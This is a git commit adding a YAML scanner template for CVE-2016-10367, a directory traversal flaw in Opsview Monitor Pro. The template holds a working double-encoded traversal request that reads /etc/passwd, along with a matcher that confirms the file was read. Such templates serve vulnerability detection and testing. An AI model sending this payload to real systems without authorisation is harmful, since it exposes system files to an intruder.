Create CVE-2016-10367.yaml

patch-1
Roberto Nunes 2022-07-31 11:20:24 +09:00 committed by GitHub
parent 2ec4873688
commit 17b820abb8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

32
CVE-2016-10367.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2016-10367
info:
name: Opsview Monitor Pro - Unauthenticated Directory Traversal
author: 0x_akoko
severity: high
description: The unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass
reference:
- https://www.cvedetails.com/cve/CVE-2016-10367
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-10367
cwe-id: CWE-22
tags: cve,cve2016,opsview,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 404